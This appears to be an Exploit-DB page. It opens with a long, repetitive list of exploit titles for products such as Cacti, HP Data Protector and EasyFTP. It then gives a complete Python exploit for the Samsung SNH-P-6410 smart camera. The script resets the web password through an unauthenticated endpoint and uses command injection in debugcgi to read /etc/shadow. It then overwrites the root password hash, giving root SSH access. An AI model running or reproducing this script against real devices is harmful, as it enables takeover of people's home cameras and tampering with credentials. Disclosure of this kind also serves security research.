8c28728c9f
2 new exploits Cacti 0.8.6d Remote Command Execution Exploit Cacti 0.8.6d - Remote Command Execution Exploit Cacti 0.8.6i (copy_cacti_user.php) SQL Injection Create Admin Exploit Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite Exploit Cacti 0.8.6-d graph_view.php Command Injection (Metasploit) Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit) Samba 3.0.10 - 3.3.5 - Format String And Security Bypass Samba 3.0.10 < 3.3.5 - Format String And Security Bypass Allomani - E-Store 1.0 - CSRF Add Admin Account Allomani - Super Multimedia 2.5 - CSRF Add Admin Account Allomani - E-Store 1.0 - CSRF (Add Admin Account) Allomani - Super Multimedia 2.5 - CSRF (Add Admin Account) HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow DoS HP Data Protector Media Operations NULL Pointer Dereference Remote DoS HP Data Protector Media Operations - NULL Pointer Dereference Remote DoS JBoss Application Server Remote Exploit JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit EasyFTP Server 1.7.0.11 MKD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 LIST Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 CWD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow EasyFTP Server 1.7.0.11 list.html path Stack Buffer Overflow EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow Cacti graph_view.php Remote Command Execution Cacti - graph_view.php Remote Command Execution Linux/SuperH (sh4) - setuid(0) - chmod(_/etc/shadow__ 0666) - exit(0) shellcode (43 bytes) Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes) HP Data Protector 6.20 EXEC_CMD Buffer Overflow HP Data Protector 6.20 - EXEC_CMD Buffer Overflow HP Data Protector Remote Shell for HP-UX HP Data Protector - Remote Shell for HP-UX WHMCompleteSolution (cart.php) 3.x.x < 4.0.x - Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - (cart.php) Local File Disclosure hp data protector media operations 6.20 - Directory Traversal HP Data Protector Media Operations 6.20 - Directory Traversal HP Data Protector 6.1 EXEC_CMD Remote Code Execution HP Data Protector 6.1 - EXEC_CMD Remote Code Execution HP Data Protector Client EXEC_CMD Remote Code Execution HP Data Protector Client - EXEC_CMD Remote Code Execution HP Data Protector Create New Folder Buffer Overflow HP Data Protector - Create New Folder Buffer Overflow Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow Irfanview JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow HP Data Protector DtbClsLogin Buffer Overflow HP Data Protector - DtbClsLogin Buffer Overflow RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Inclusion RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.php Remote Command Execution Variant RaXnet Cacti 0.5/0.6.x/0.8.x - Graph_Image.php Remote Command Execution Variant TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) - Crash PoC TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash PoC HP Data Protector Arbitrary Remote Command Execution HP Data Protector - Arbitrary Remote Command Execution Indusoft Thin Client 7.1 - ActiveX - Buffer Overflow Indusoft Thin Client 7.1 - ActiveX Buffer Overflow BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities HP Data Protector Cell Request Service Buffer Overflow HP Data Protector - Cell Request Service Buffer Overflow Firefox 5.0 - 15.0.1 - __exposedProps__ XCS Code Execution Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution Cacti 0.8.7 graph_view.php graph_list Parameter SQL Injection Cacti 0.8.7 graph.php view_type Parameter XSS Cacti 0.8.7 graph_view.php filter Parameter XSS Cacti 0.8.7 tree.php Multiple Parameter SQL Injection Cacti 0.8.7 graph_xport.php local_graph_id Parameter SQL Injection Cacti 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection Cacti 0.8.7 - graph.php view_type Parameter XSS Cacti 0.8.7 - graph_view.php filter Parameter XSS Cacti 0.8.7 - tree.php Multiple Parameter SQL Injection Cacti 0.8.7 - graph_xport.php local_graph_id Parameter SQL Injection Cacti 0.8.7 - index.php/sql.php Login Action login_username Parameter SQL Injection MG2 - 'list' Parameter - Cross-Site Scripting MG2 - 'list' Parameter Cross-Site Scripting HP Data Protector Backup Client Service - Directory Traversal HP Data Protector - Backup Client Service Directory Traversal HP Data Protector EXEC_BAR Remote Command Execution HP Data Protector - EXEC_BAR Remote Command Execution HP Data Protector Backup Client Service Remote Code Execution HP Data Protector - Backup Client Service Remote Code Execution Cacti 0.8.x graph.php Multiple Parameter XSS Cacti 0.8.x - graph.php Multiple Parameter XSS Jetty 6.1.x JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities Cacti 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS Cacti 0.8.7 (Red Hat High Performance Computing - HPC) - utilities.php filter Parameter XSS HP Data Protector EXEC_INTEGUTIL Remote Code Execution HP Data Protector - EXEC_INTEGUTIL Remote Code Execution HP Data Protector 8.10 Remote Command Execution HP Data Protector 8.10 - Remote Command Execution Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Local Privilege Escalation Wireshark 2.0.0 - 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service Wireshark 2.0.0 - 2.0.4 - CORBA IDL Dissectors Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - RLC Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service Wireshark 2.0.0 < 2.0.4 - CORBA IDL Dissectors Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service FreePBX 13 / 14 - Remote Code Execution FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit Samsung Smart Home Camera SNH-P-6410 - Command Injection
64 lines
No EOL
2.2 KiB
Python
Executable file
64 lines
No EOL
2.2 KiB
Python
Executable file
# E-DB Note: source ~ https://www.pentestpartners.com/blog/samsungs-smart-camera-a-tale-of-iot-network-security/
|
|
|
|
import urllib, urllib2, crypt, time
|
|
|
|
# New password for web interface
|
|
web_password = 'admin'
|
|
# New password for root
|
|
root_password = 'root'
|
|
# IP of the camera
|
|
ip = '192.168.12.61'
|
|
|
|
# These are all for the Smartthings bundled camera
|
|
realm = 'iPolis'
|
|
web_username = 'admin'
|
|
base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi?msubmenu=shell&command=ls&command_arg=/...;'
|
|
|
|
|
|
# Take a command and use command injection to run it on the device
|
|
def run_command(command):
|
|
# Convert a normal command into one using bash brace expansion
|
|
# Can't send spaces to debugcgi as it doesn't unescape
|
|
command_brace = '{' + ','.join(command.split(' ')) + '}'
|
|
command_url = base_url + command_brace
|
|
|
|
# HTTP digest auth for urllib2
|
|
authhandler = urllib2.HTTPDigestAuthHandler()
|
|
authhandler.add_password(realm, command_url, web_username, web_password)
|
|
opener = urllib2.build_opener(authhandler)
|
|
urllib2.install_opener(opener)
|
|
|
|
return urllib2.urlopen(command_url)
|
|
|
|
# Step 1 - change the web password using the unauthed vuln found by zenofex
|
|
data = urllib.urlencode({ 'data' : 'NEW;' + web_password })
|
|
urllib2.urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)
|
|
|
|
# Need to sleep or the password isn't changed
|
|
time.sleep(1)
|
|
|
|
# Step 2 - find the current root password hash
|
|
shadow = run_command('cat /etc/shadow')
|
|
|
|
for line in shadow:
|
|
if line.startswith('root:'):
|
|
current_hash = line.split(':')[1]
|
|
|
|
# Crypt the new password
|
|
new_hash = crypt.crypt(root_password, '00')
|
|
|
|
# Step 3 - Use sed to search and replace the old for new hash in the passwd
|
|
# This is done because the command injection doesn't allow a lot of different URL encoded chars
|
|
run_command('sed -i -e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')
|
|
|
|
# Step 4 - check that the password has changed
|
|
shadow = run_command('cat /etc/shadow')
|
|
|
|
for line in shadow:
|
|
if line.startswith('root:'):
|
|
current_hash = line.split(':')[1]
|
|
|
|
if current_hash <> new_hash:
|
|
print 'Error! - password not changed'
|
|
|
|
# Step 5 - ssh to port 1022 with new root password! |